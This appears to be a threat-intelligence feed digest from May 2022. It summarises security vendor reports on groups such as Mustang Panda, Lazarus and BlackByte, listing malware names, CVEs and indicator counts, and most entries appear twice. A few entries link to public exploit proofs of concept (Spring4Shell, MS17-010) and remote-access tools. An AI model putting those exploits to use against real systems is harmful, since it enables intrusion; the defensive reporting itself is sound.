#ParsedReport
04-05-2022
Old Services, New Tricks: Cloud Metadata Abuse by UNC2903
https://www.mandiant.com/resources/cloud-metadata-abuse-unc2903
Actors/Campaigns:
Unc2903 (tags: scan, rat, malware, proxy, vpn)
Industry:
Financial
CVEs:
CVE-2021-21311 [Vulners]
Vulners: Score: 6.4, CVSS: 4.5,
Vulners: Exploitation: Unknown
X-Force: Risk: 5.3
X-Force: Patch: Official fix
Soft:
- adminer (<4.7.9)
- debian debian linux (9.0)
CVE-2019-0211 [Vulners]
Vulners: Score: 7.2, CVSS: 3.9,
Vulners: Exploitation: Unknown
X-Force: Risk: 8.2
X-Force: Patch: Official fix
Soft:
- apache http server (le2.4.38)
- fedoraproject fedora (29, 30)
- canonical ubuntu linux (16.04, 18.04, 18.10, 14.04)
- debian debian linux (9.0)
- opensuse leap (42.3, 15.0)
have more...
TTPs:
Tactics: 5
Technics: 6
IOCs:
IP: 5
Url: 3
File: 3
Coin: 3
Hash: 1
Links:
04-05-2022
Old Services, New Tricks: Cloud Metadata Abuse by UNC2903
https://www.mandiant.com/resources/cloud-metadata-abuse-unc2903
Actors/Campaigns:
Unc2903 (tags: scan, rat, malware, proxy, vpn)
Industry:
Financial
CVEs:
CVE-2021-21311 [Vulners]
Vulners: Score: 6.4, CVSS: 4.5,
Vulners: Exploitation: Unknown
X-Force: Risk: 5.3
X-Force: Patch: Official fix
Soft:
- adminer (<4.7.9)
- debian debian linux (9.0)
CVE-2019-0211 [Vulners]
Vulners: Score: 7.2, CVSS: 3.9,
Vulners: Exploitation: Unknown
X-Force: Risk: 8.2
X-Force: Patch: Official fix
Soft:
- apache http server (le2.4.38)
- fedoraproject fedora (29, 30)
- canonical ubuntu linux (16.04, 18.04, 18.10, 14.04)
- debian debian linux (9.0)
- opensuse leap (42.3, 15.0)
have more...
TTPs:
Tactics: 5
Technics: 6
IOCs:
IP: 5
Url: 3
File: 3
Coin: 3
Hash: 1
Links:
https://github.com/duo-labs/cloudmapperhttps://github.com/latacora/remediate-AWS-IMDSv1https://github.com/vrana/adminer/security/advisories/GHSA-x5r2-hj5c-8jx6https://github.com/salesforce/metabadgerhttps://github.com/prowler-cloud/prowler/blob/master/checks/check\_extra786Google Cloud Blog
Old Services, New Tricks: Cloud Metadata Abuse by UNC2903 | Google Cloud Blog
#ParsedReport
04-05-2022
Minerva Labs Blog
https://blog.minerva-labs.com/a-new-blustealer-loader-uses-direct-syscalls-to-evade-edrs
Threats:
Blu_stealer (tags: phishing, stealer, malware, cryptomining, ransomware)
Spyex
Hallowing_technique
Exodus
TTPs:
Tactics: 1
Technics: 0
IOCs:
File: 4
Path: 4
Registry: 2
Hash: 4
04-05-2022
Minerva Labs Blog
https://blog.minerva-labs.com/a-new-blustealer-loader-uses-direct-syscalls-to-evade-edrs
Threats:
Blu_stealer (tags: phishing, stealer, malware, cryptomining, ransomware)
Spyex
Hallowing_technique
Exodus
TTPs:
Tactics: 1
Technics: 0
IOCs:
File: 4
Path: 4
Registry: 2
Hash: 4
Rapid7
Rapid7 Cybersecurity - Command Your Attack Surface
Level up SecOps with the only endpoint to cloud, unified cybersecurity platform. Confidently act to prevent breaches with a leading MDR partner. Request demo!
#ParsedReport
04-05-2022
Operation CuckooBees: Cybereason Uncovers Massive Chinese Intellectual Property Theft Operation
https://www.cybereason.com/blog/operation-cuckoobees-cybereason-uncovers-massive-chinese-intellectual-property-theft-operation
Actors/Campaigns:
Axiom (tags: malware)
Threats:
Deploylog
Spyder
Privatelog
Winnkit
Stashlog
Eternal_petya
Industry:
Government, E-commerce
Geo:
America, Asia, Chinese, China
04-05-2022
Operation CuckooBees: Cybereason Uncovers Massive Chinese Intellectual Property Theft Operation
https://www.cybereason.com/blog/operation-cuckoobees-cybereason-uncovers-massive-chinese-intellectual-property-theft-operation
Actors/Campaigns:
Axiom (tags: malware)
Threats:
Deploylog
Spyder
Privatelog
Winnkit
Stashlog
Eternal_petya
Industry:
Government, E-commerce
Geo:
America, Asia, Chinese, China
Cybereason
Operation CuckooBees: Cybereason Uncovers Massive Chinese Intellectual Property Theft Operation
Cybereason recently an attack assessed to be the work of Chinese APT Winnti that operated undetected, siphoning intellectual property and sensitive data - the two companion reports examine the tactics and techniques of the overall campaign as well as more…
#ParsedReport
05-05-2022
NetDooka Framework Distributed via PrivateLoader Malware as Part of Pay-Per-Install Service. Attack overview
https://www.trendmicro.com/en_us/research/22/e/netdooka-framework-distributed-via-privateloader-ppi.html
Threats:
Netdooka (tags: botnet, backdoor, trojan, malware, dropper, rat, ddos)
Privateloader (tags: botnet, backdoor, trojan, malware, dropper, rat, ddos)
Smokeloader_backdoor (tags: malware)
Redline_stealer (tags: malware)
Anubis (tags: malware)
Viper_rat
Trojan.win32.stop.el
Trojan.win64.protdrive.a
Trojan.win32.vindor.a
IOCs:
File: 4
Path: 3
IP: 3
Hash: 38
Url: 5
Links:
05-05-2022
NetDooka Framework Distributed via PrivateLoader Malware as Part of Pay-Per-Install Service. Attack overview
https://www.trendmicro.com/en_us/research/22/e/netdooka-framework-distributed-via-privateloader-ppi.html
Threats:
Netdooka (tags: botnet, backdoor, trojan, malware, dropper, rat, ddos)
Privateloader (tags: botnet, backdoor, trojan, malware, dropper, rat, ddos)
Smokeloader_backdoor (tags: malware)
Redline_stealer (tags: malware)
Anubis (tags: malware)
Viper_rat
Trojan.win32.stop.el
Trojan.win64.protdrive.a
Trojan.win32.vindor.a
IOCs:
File: 4
Path: 3
IP: 3
Hash: 38
Url: 5
Links:
https://github.com/microsoft/Windows-driver-samples/tree/master/general/obcallbackhttps://github.com/SweetIceLolly/Prevent\_File\_DeletionTrend Micro
NetDooka Framework Distributed via PrivateLoader Malware as Part of Pay-Per-Install Service
This report focuses on the components and infection chain of the NetDooka framework. Its scope ranges from the release of the first payload up until the release of the final RAT that is protected by a kernel driver.
#ParsedReport
05-05-2022
Top Cyber Threats to the Telecom Industry
https://www.intezer.com/blog/incident-response/cyber-threats-telecom-industry
Actors/Campaigns:
Lightbasin
Lapsus
Evil_corp
Threats:
Macaw
Cobalt_strike
Beacon
Vermilion
Industry:
Telco, Iot, Aerospace, Media
Geo:
Russian, Iranian, Polish
05-05-2022
Top Cyber Threats to the Telecom Industry
https://www.intezer.com/blog/incident-response/cyber-threats-telecom-industry
Actors/Campaigns:
Lightbasin
Lapsus
Evil_corp
Threats:
Macaw
Cobalt_strike
Beacon
Vermilion
Industry:
Telco, Iot, Aerospace, Media
Geo:
Russian, Iranian, Polish
Intezer
Top Cyber Threats to the Telecom Industry
Learn about top threats to the telecom industry and how teams are using automation to keep up with alert triage, incident response, and threat hunting.
Как-то мимо прошло обновление списка группировок
https://twitter.com/Cyberknow20/status/1520746724763250688
https://twitter.com/Cyberknow20/status/1520746724763250688
Twitter
CyberKnow
📢📢Update 13. 1 MAY. #cybertracker 📢📢 74 Groups: 46 Pro-Ukraine 26 Pro-Russia 2 Unknown(UNK) 7 removed. Usual caveats apply. Tips/Info welcome. #cybersecurity #ThreatIntelligence #Russiaukrainewar #CyberAttack #infosec #UkraineRussiaWar cyberknow.medium.com/update…
#ParsedReport
05-05-2022
Mustang Panda deploys a new wave of malware targeting Europe
http://blog.talosintelligence.com/2022/05/mustang-panda-targets-europe.html
Actors/Campaigns:
Red_delta (tags: trojan, rat, phishing, malware)
Threats:
Meterpreter_tool (tags: rat, malware)
Plugx_rat (tags: rat, malware)
Cobalt_strike
Bespoke (tags: rat, malware)
Lolbas_technique
Industry:
Telco, Government, Ngo
Geo:
Russia, Mongolia, Afghan, Japanese, Ukraine, Asia, Tibet, Japan, Taiwan, Ukrainian, Belarus, Myanmar, Greece, Indian, American, Asian
IOCs:
File: 14
IP: 28
Path: 5
Registry: 1
Hash: 114
Domain: 1
Url: 44
05-05-2022
Mustang Panda deploys a new wave of malware targeting Europe
http://blog.talosintelligence.com/2022/05/mustang-panda-targets-europe.html
Actors/Campaigns:
Red_delta (tags: trojan, rat, phishing, malware)
Threats:
Meterpreter_tool (tags: rat, malware)
Plugx_rat (tags: rat, malware)
Cobalt_strike
Bespoke (tags: rat, malware)
Lolbas_technique
Industry:
Telco, Government, Ngo
Geo:
Russia, Mongolia, Afghan, Japanese, Ukraine, Asia, Tibet, Japan, Taiwan, Ukrainian, Belarus, Myanmar, Greece, Indian, American, Asian
IOCs:
File: 14
IP: 28
Path: 5
Registry: 1
Hash: 114
Domain: 1
Url: 44
Cisco Talos Blog
Mustang Panda deploys a new wave of malware targeting Europe
* In February 2022, corresponding roughly with the start of the Russian Invasion of Ukraine, Cisco Talos began observing the China-based threat actor Mustang Panda conducting phishing campaigns against European entities, including Russian organizations. Some…
#ParsedReport
05-05-2022
"Excuse me, how will the conflict between Russia and Ukraine affect the situation on the peninsula?" Analysis of the recent targeted attack activities of APT organization Kimsuky
https://blog-nsfocus-net.translate.goog/apt-kimsuky-3/?_x_tr_sch=http&_x_tr_sl=auto&_x_tr_tl=en&_x_tr_hl=ru&_x_tr_pto=wapp
Actors/Campaigns:
Kimsuky (tags: trojan, phishing, malware)
Geo:
Ukraine, Korea, Russia
IOCs:
File: 27
Url: 7
Path: 1
05-05-2022
"Excuse me, how will the conflict between Russia and Ukraine affect the situation on the peninsula?" Analysis of the recent targeted attack activities of APT organization Kimsuky
https://blog-nsfocus-net.translate.goog/apt-kimsuky-3/?_x_tr_sch=http&_x_tr_sl=auto&_x_tr_tl=en&_x_tr_hl=ru&_x_tr_pto=wapp
Actors/Campaigns:
Kimsuky (tags: trojan, phishing, malware)
Geo:
Ukraine, Korea, Russia
IOCs:
File: 27
Url: 7
Path: 1
#ParsedReport
05-05-2022
North Koreas Lazarus: their initial access trade-craft using social media and social engineering. tl;dr
https://research.nccgroup.com/2022/05/05/north-koreas-lazarus-and-their-initial-access-trade-craft-using-social-media-and-social-engineering
Actors/Campaigns:
Lazarus (tags: malware, vpn, phishing)
Threats:
Lcpdot (tags: vpn, malware)
Industry:
Government
Geo:
Koreas
TTPs:
Tactics: 1
Technics: 4
IOCs:
Domain: 6
Path: 2
File: 3
IP: 1
Hash: 6
05-05-2022
North Koreas Lazarus: their initial access trade-craft using social media and social engineering. tl;dr
https://research.nccgroup.com/2022/05/05/north-koreas-lazarus-and-their-initial-access-trade-craft-using-social-media-and-social-engineering
Actors/Campaigns:
Lazarus (tags: malware, vpn, phishing)
Threats:
Lcpdot (tags: vpn, malware)
Industry:
Government
Geo:
Koreas
TTPs:
Tactics: 1
Technics: 4
IOCs:
Domain: 6
Path: 2
File: 3
IP: 1
Hash: 6
#ParsedReport
05-05-2022
Nigerian Tesla: 419 scammer gone malware distributor unmasked
https://blog.malwarebytes.com/threat-intelligence/2022/05/nigerian-tesla-419-scammer-gone-malware-distributor-unmasked
Threats:
Agent_tesla (tags: phishing, ransomware, malware, spam, stealer, scam, dns, vpn)
Avemaria_rat
Netwire_rat
4shared
Cassandraprotector_tool
Geo:
Nigeria, Nigerian, Ukraine, Ukrainian
IOCs:
File: 2
Email: 25
Domain: 1
05-05-2022
Nigerian Tesla: 419 scammer gone malware distributor unmasked
https://blog.malwarebytes.com/threat-intelligence/2022/05/nigerian-tesla-419-scammer-gone-malware-distributor-unmasked
Threats:
Agent_tesla (tags: phishing, ransomware, malware, spam, stealer, scam, dns, vpn)
Avemaria_rat
Netwire_rat
4shared
Cassandraprotector_tool
Geo:
Nigeria, Nigerian, Ukraine, Ukrainian
IOCs:
File: 2
Email: 25
Domain: 1
Malwarebytes Labs
Nigerian Tesla: 419 scammer gone malware distributor unmasked
Scamming, phishing and other data theft is all part of Nigeria Tesla's portfolio.
#ParsedReport
05-05-2022
Cybercrime loves company: Conti cooperated with other ransomware gangs
https://intel471.com/blog/conti-ransomware-cooperation-maze-lockbit-ragnar-locker
Threats:
Conti (tags: ransomware, malware)
Ryuk (tags: ransomware)
Maze (tags: ransomware)
Lockbit (tags: ransomware)
Ragnarlocker (tags: ransomware)
Emotet (tags: ransomware)
Trickbot
Geo:
Russian
05-05-2022
Cybercrime loves company: Conti cooperated with other ransomware gangs
https://intel471.com/blog/conti-ransomware-cooperation-maze-lockbit-ragnar-locker
Threats:
Conti (tags: ransomware, malware)
Ryuk (tags: ransomware)
Maze (tags: ransomware)
Lockbit (tags: ransomware)
Ragnarlocker (tags: ransomware)
Emotet (tags: ransomware)
Trickbot
Geo:
Russian
Intel471
Cybercrime loves company: Conti cooperated with other ransomware gangs
Conti kept a close eye on other ransomware groups and borrowed some of their techniques and best practices for their own operations.
#ParsedReport
05-05-2022
Shells blooming in Spring
https://labs.k7computing.com/index.php/shells-blooming-in-spring
Threats:
Spring4shell (tags: rat)
Log4shell_vuln (tags: rat)
Mirai
Emotet
CVEs:
CVE-2022-22965 [Vulners]
Vulners: Score: 7.5, CVSS: PENDING,
Vulners: Exploitation: Unknown
X-Force: Risk: 9.8
X-Force: Patch: Official fix
Soft:
- vmware spring framework (<5.2.20, <5.3.18)
- cisco cx cloud agent (<2.1.0)
- oracle communications cloud native core automated test suite (1.9.0, 22.1.0)
- oracle communications cloud native core console (1.9.0, 22.1.0)
- oracle communications cloud native core network exposure function (22.1.0)
have more...
CVE-2022-22695 [Vulners]
CVE-2022-22963 [Vulners]
Vulners: Score: 7.5, CVSS: PENDING,
Vulners: Exploitation: Unknown
X-Force: Risk: 9.8
X-Force: Patch: Official fix
Soft:
- vmware spring cloud function (le3.1.6, le3.2.2)
IOCs:
File: 8
Hash: 1
Links:
05-05-2022
Shells blooming in Spring
https://labs.k7computing.com/index.php/shells-blooming-in-spring
Threats:
Spring4shell (tags: rat)
Log4shell_vuln (tags: rat)
Mirai
Emotet
CVEs:
CVE-2022-22965 [Vulners]
Vulners: Score: 7.5, CVSS: PENDING,
Vulners: Exploitation: Unknown
X-Force: Risk: 9.8
X-Force: Patch: Official fix
Soft:
- vmware spring framework (<5.2.20, <5.3.18)
- cisco cx cloud agent (<2.1.0)
- oracle communications cloud native core automated test suite (1.9.0, 22.1.0)
- oracle communications cloud native core console (1.9.0, 22.1.0)
- oracle communications cloud native core network exposure function (22.1.0)
have more...
CVE-2022-22695 [Vulners]
CVE-2022-22963 [Vulners]
Vulners: Score: 7.5, CVSS: PENDING,
Vulners: Exploitation: Unknown
X-Force: Risk: 9.8
X-Force: Patch: Official fix
Soft:
- vmware spring cloud function (le3.1.6, le3.2.2)
IOCs:
File: 8
Hash: 1
Links:
https://github.com/dinosn/CVE-2022-22963https://github.com/lunasec-io/Spring4Shell-POChttps://github.com/reznok/Spring4Shell-POCK7 Labs
Shells blooming in Spring - K7 Labs
Yet another vulnerability has been reported in the Java platform, this time in the popular Java Spring framework, just a […]
#ParsedReport
06-05-2022
Mobile subscription Trojans and their little tricks
https://securelist.com/mobile-subscription-trojans-and-their-tricks/106412
Threats:
Vesub (tags: trojan, malware)
Triada
Joker (tags: trojan)
Industry:
E-commerce, Financial
Geo:
Russia, Arabia, Russian, Indonesia, Austria, China, Brazil, Saudi, Switzerland, Mexico, Turkey, Egypt, Poland, India, Germany, Africa, Thailand, Belarus, Algeria, Ukraine, Arab, Malaysia, Oman
IOCs:
File: 4
Hash: 37
06-05-2022
Mobile subscription Trojans and their little tricks
https://securelist.com/mobile-subscription-trojans-and-their-tricks/106412
Threats:
Vesub (tags: trojan, malware)
Triada
Joker (tags: trojan)
Industry:
E-commerce, Financial
Geo:
Russia, Arabia, Russian, Indonesia, Austria, China, Brazil, Saudi, Switzerland, Mexico, Turkey, Egypt, Poland, India, Germany, Africa, Thailand, Belarus, Algeria, Ukraine, Arab, Malaysia, Oman
IOCs:
File: 4
Hash: 37
Securelist
The Trojan subscribers Joker, MobOk, Vesub and GriftHorse
Kaspersky analysis of mobile subscription Trojans Joker (Jocker), MobOk, Vesub and GriftHorse and their activity: technical description and statistics.
#ParsedReport
06-05-2022
macOS Malware Is More Reality Than Myth: Popular Threats and Challenges in Analysis
https://www.crowdstrike.com/blog/how-crowdstrike-analyzes-macos-malware-to-optimize-automated-detection-capabilities
Threats:
Applescript
TTPs:
Tactics: 1
Technics: 0
IOCs:
File: 2
Hash: 9
06-05-2022
macOS Malware Is More Reality Than Myth: Popular Threats and Challenges in Analysis
https://www.crowdstrike.com/blog/how-crowdstrike-analyzes-macos-malware-to-optimize-automated-detection-capabilities
Threats:
Applescript
TTPs:
Tactics: 1
Technics: 0
IOCs:
File: 2
Hash: 9
crowdstrike.com
How CrowdStrike Analyzes macOS Malware to Optimize Automated Detection
Learn how CrowdStrike macOS malware research is turned into expert input and knowledge that’s used to optimize the automated detection capabilities of the Falcon platform.
#ParsedReport
06-05-2022
Raspberry Robin gets the worm early
https://redcanary.com/blog/raspberry-robin
Threats:
Raspberry_robin (tags: rat, malware)
TTPs:
Tactics: 5
Technics: 5
IOCs:
File: 11
Path: 6
Domain: 2
Hash: 2
Registry: 1
Url: 2
06-05-2022
Raspberry Robin gets the worm early
https://redcanary.com/blog/raspberry-robin
Threats:
Raspberry_robin (tags: rat, malware)
TTPs:
Tactics: 5
Technics: 5
IOCs:
File: 11
Path: 6
Domain: 2
Hash: 2
Registry: 1
Url: 2
Red Canary
Raspberry Robin gets the worm early
Raspberry Robin is a worm spread by external drives that leverages Windows Installer to download a malicious DLL.
#ParsedReport
06-05-2022
Bad Rabbit Ransomware
https://www.varonis.com/blog/bad-rabbit-ransomware
Actors/Campaigns:
Sandworm
Threats:
Watering_hole_technique
Imminentmonitor_rat
Mimikatz
Mamba
Stop
Industry:
Financial
Geo:
Russia, Ukraines, Russian, Japan
CVEs:
CVE-2017-0145 [Vulners]
Vulners: Score: 9.3, CVSS: 8.9,
Vulners: Exploitation: True
X-Force: Risk: 9.8
X-Force: Patch: Official fix
Soft:
- microsoft server message block (1.0)
IOCs:
Domain: 1
IP: 1
Url: 26
Hash: 6
Links:
06-05-2022
Bad Rabbit Ransomware
https://www.varonis.com/blog/bad-rabbit-ransomware
Actors/Campaigns:
Sandworm
Threats:
Watering_hole_technique
Imminentmonitor_rat
Mimikatz
Mamba
Stop
Industry:
Financial
Geo:
Russia, Ukraines, Russian, Japan
CVEs:
CVE-2017-0145 [Vulners]
Vulners: Score: 9.3, CVSS: 8.9,
Vulners: Exploitation: True
X-Force: Risk: 9.8
X-Force: Patch: Official fix
Soft:
- microsoft server message block (1.0)
IOCs:
Domain: 1
IP: 1
Url: 26
Hash: 6
Links:
https://github.com/worawit/MS17-010/blob/master/zzz\_exploit.pyVaronis
Bad Rabbit Ransomware
Bad Rabbit is a ransomware strain that spread via hacked websites, infected systems via a fake Adobe installer and held encrypted files for Bitcoin.
#ParsedReport
06-05-2022
Emotet: New Delivery Mechanism to Bypass VBA Protection
https://www.netskope.com/blog/emotet-new-delivery-mechanism-to-bypass-vba-protection
Threats:
Emotet (tags: botnet, rat, trojan, malware, phishing, fraud)
Trickbot
Spring4shell
Industry:
Financial
IOCs:
File: 9
Hash: 143
Url: 12
IP: 67
YARA: Found
Links:
06-05-2022
Emotet: New Delivery Mechanism to Bypass VBA Protection
https://www.netskope.com/blog/emotet-new-delivery-mechanism-to-bypass-vba-protection
Threats:
Emotet (tags: botnet, rat, trojan, malware, phishing, fraud)
Trickbot
Spring4shell
Industry:
Financial
IOCs:
File: 9
Hash: 143
Url: 12
IP: 67
YARA: Found
Links:
https://github.com/netskopeoss/NetskopeThreatLabsIOCs/tree/main/Emotet/IOCs/2022-05-06https://github.com/netskopeoss/NetskopeThreatLabsIOCs/blob/main/Emotet/IOCs/script/decrypt\_payload.pyhttps://github.com/netskopeoss/NetskopeThreatLabsIOCs/blob/main/Emotet/IOCs/script/decrypt\_c2.pyhttps://github.com/netskopeoss/NetskopeThreatLabsIOCs/tree/main/EmotetNetskope
Emotet: New Delivery Mechanism to Bypass VBA Protection
Summary Emotet started as a banking trojan in 2014 and later evolved to what has been considered the world's most dangerous malware by Europol, often used
PhD2022_IoCs_Scoring_v2.pdf
880.5 KB
Сегодня на PhDays рассказал про то как у нас в RST Cloud работает скоринг индикаторов.
Вот преза, кстати :)
Вот преза, кстати :)
🔥3
#ParsedReport
19-05-2022
Space Pirates: Explore the tools and connections of a new hacker group
https://www.ptsecurity.com/ru-ru/research/pt-esc-threat-intelligence/space-pirates-tools-and-connections
Actors/Campaigns:
Spacepirates (tags: dropper, malware, dns, backdoor, rat, phishing, proxy)
Axiom
Emissary_panda
Ta428
Red_delta
Redfoxtrot
Stealthytrident
Nightscout
Threats:
Zupdax (tags: rat)
Former_first_rat
Climax_loader
Rtlshare
Plugx_rat (tags: backdoor, dropper)
9002 (tags: rat)
Deed_rat (tags: dns, rat)
Pcshare
Poison_ivy
Shadowpad
Revbshell
Tmanger
Albaniiutas_rat
Bluetraveller_rat
Hyperbro
Smokeloader_backdoor
Reactorbot
Gh0st_rat
Chromepass_tool
Industry:
Aerospace, Financial, Government, Energy
Geo:
Asian, Chinese, Russia, Mongolia, Georgia, Japanese
CVEs:
CVE-2017-0213 [Vulners]
Vulners: Score: 1.9, CVSS: 6.4,
Vulners: Exploitation: True
X-Force: Risk: 7
X-Force: Patch: Official fix
Soft:
- microsoft windows 10 (1607, -, 1511, 1703)
- microsoft windows rt 8.1 (*)
- microsoft windows server 2012 (-, r2)
- microsoft windows server 2008 (r2, *)
- microsoft windows 8.1 (*)
have more...
TTPs:
Tactics: 10
Technics: 54
IOCs:
File: 51
Path: 20
Email: 1
IP: 23
Hash: 156
Registry: 8
Links:
19-05-2022
Space Pirates: Explore the tools and connections of a new hacker group
https://www.ptsecurity.com/ru-ru/research/pt-esc-threat-intelligence/space-pirates-tools-and-connections
Actors/Campaigns:
Spacepirates (tags: dropper, malware, dns, backdoor, rat, phishing, proxy)
Axiom
Emissary_panda
Ta428
Red_delta
Redfoxtrot
Stealthytrident
Nightscout
Threats:
Zupdax (tags: rat)
Former_first_rat
Climax_loader
Rtlshare
Plugx_rat (tags: backdoor, dropper)
9002 (tags: rat)
Deed_rat (tags: dns, rat)
Pcshare
Poison_ivy
Shadowpad
Revbshell
Tmanger
Albaniiutas_rat
Bluetraveller_rat
Hyperbro
Smokeloader_backdoor
Reactorbot
Gh0st_rat
Chromepass_tool
Industry:
Aerospace, Financial, Government, Energy
Geo:
Asian, Chinese, Russia, Mongolia, Georgia, Japanese
CVEs:
CVE-2017-0213 [Vulners]
Vulners: Score: 1.9, CVSS: 6.4,
Vulners: Exploitation: True
X-Force: Risk: 7
X-Force: Patch: Official fix
Soft:
- microsoft windows 10 (1607, -, 1511, 1703)
- microsoft windows rt 8.1 (*)
- microsoft windows server 2012 (-, r2)
- microsoft windows server 2008 (r2, *)
- microsoft windows 8.1 (*)
have more...
TTPs:
Tactics: 10
Technics: 54
IOCs:
File: 51
Path: 20
Email: 1
IP: 23
Hash: 156
Registry: 8
Links:
https://translate.google.com/website?sl=auto&tl=en&hl=ru&client=webapp&u=https://github.com/obfuscator-llvm/obfuscator/wiki/Control-Flow-Flattening
https://translate.google.com/website?sl=auto&tl=en&hl=ru&client=webapp&u=https://github.com/bitsadmin/ReVBShell
https://translate.google.com/website?sl=auto&tl=en&hl=ru&client=webapp&u=https://github.com/vzex/dog-tunnel
https://translate.google.com/website?sl=auto&tl=en&hl=ru&client=webapp&u=https://github.com/LiveMirror/pcshareptsecurity.com
Блог PT ESC Threat Intelligence
В этом блоге вы можете найти информацию об актуальных атаках хакерских группировок по всему миру, разбор их инструментов, информацию об инцидентах, TTP группировок, индикаторы компрометации и названия детектов в наших продуктах
#ParsedReport
19-05-2022
Phishing Campaign Delivering Three Fileless Malware: AveMariaRAT / BitRAT / PandoraHVNC Part I
https://www.fortinet.com/blog/threat-research/phishing-campaign-delivering-fileless-malware
Actors/Campaigns:
Keksec (tags: malware, phishing)
Threats:
Avemaria_rat (tags: ransomware, spam, malware, phishing, rat, ddos, proxy, botnet)
Sbit_rat (tags: ransomware, spam, malware, phishing, rat, ddos, proxy, botnet)
Pandorahvnc (tags: spam, botnet, malware, phishing, rat, ddos, proxy, ransomware)
Emotet (tags: malware, phishing)
Enemybot (tags: malware, phishing)
Vba/agent.ddon!tr (tags: malware)
Industry:
Financial
IOCs:
File: 17
Url: 5
Path: 2
Hash: 3
19-05-2022
Phishing Campaign Delivering Three Fileless Malware: AveMariaRAT / BitRAT / PandoraHVNC Part I
https://www.fortinet.com/blog/threat-research/phishing-campaign-delivering-fileless-malware
Actors/Campaigns:
Keksec (tags: malware, phishing)
Threats:
Avemaria_rat (tags: ransomware, spam, malware, phishing, rat, ddos, proxy, botnet)
Sbit_rat (tags: ransomware, spam, malware, phishing, rat, ddos, proxy, botnet)
Pandorahvnc (tags: spam, botnet, malware, phishing, rat, ddos, proxy, ransomware)
Emotet (tags: malware, phishing)
Enemybot (tags: malware, phishing)
Vba/agent.ddon!tr (tags: malware)
Industry:
Financial
IOCs:
File: 17
Url: 5
Path: 2
Hash: 3
Fortinet Blog
Phishing Campaign Delivering Three Fileless Malware: AveMariaRAT / BitRAT / PandoraHVNC – Part I
FortiGuard Labs discovered a phishing campaign delivering fileless malware to steal sensitive information from a victim’s device. Read our analysis to find out more about how the campaign executes …
#ParsedReport
19-05-2022
The BlackByte ransomware group is striking users all over the globe
http://blog.talosintelligence.com/2022/05/the-blackbyte-ransomware-group-is.html
Threats:
Blackbyte (tags: vpn, phishing, malware, ransomware)
Lolbin
Anydesk_tool
Proxyshell_vuln
Psexec_tool
Industry:
Financial
Geo:
Mexico, Netherlands, America, China, Colombia, Vietnam
IOCs:
File: 5
Path: 1
Links:
19-05-2022
The BlackByte ransomware group is striking users all over the globe
http://blog.talosintelligence.com/2022/05/the-blackbyte-ransomware-group-is.html
Threats:
Blackbyte (tags: vpn, phishing, malware, ransomware)
Lolbin
Anydesk_tool
Proxyshell_vuln
Psexec_tool
Industry:
Financial
Geo:
Mexico, Netherlands, America, China, Colombia, Vietnam
IOCs:
File: 5
Path: 1
Links:
https://github.com/Neo23x0/RaccineCisco Talos Blog
The BlackByte ransomware group is striking users all over the globe
News summary
* Cisco Talos has been monitoring the BlackByte Ransomware Group for several months, infecting victims all over the world, from North America to Colombia, Netherlands, China, Mexico and Vietnam.
* The FBI released a joint cybersecurity advisory…
* Cisco Talos has been monitoring the BlackByte Ransomware Group for several months, infecting victims all over the world, from North America to Colombia, Netherlands, China, Mexico and Vietnam.
* The FBI released a joint cybersecurity advisory…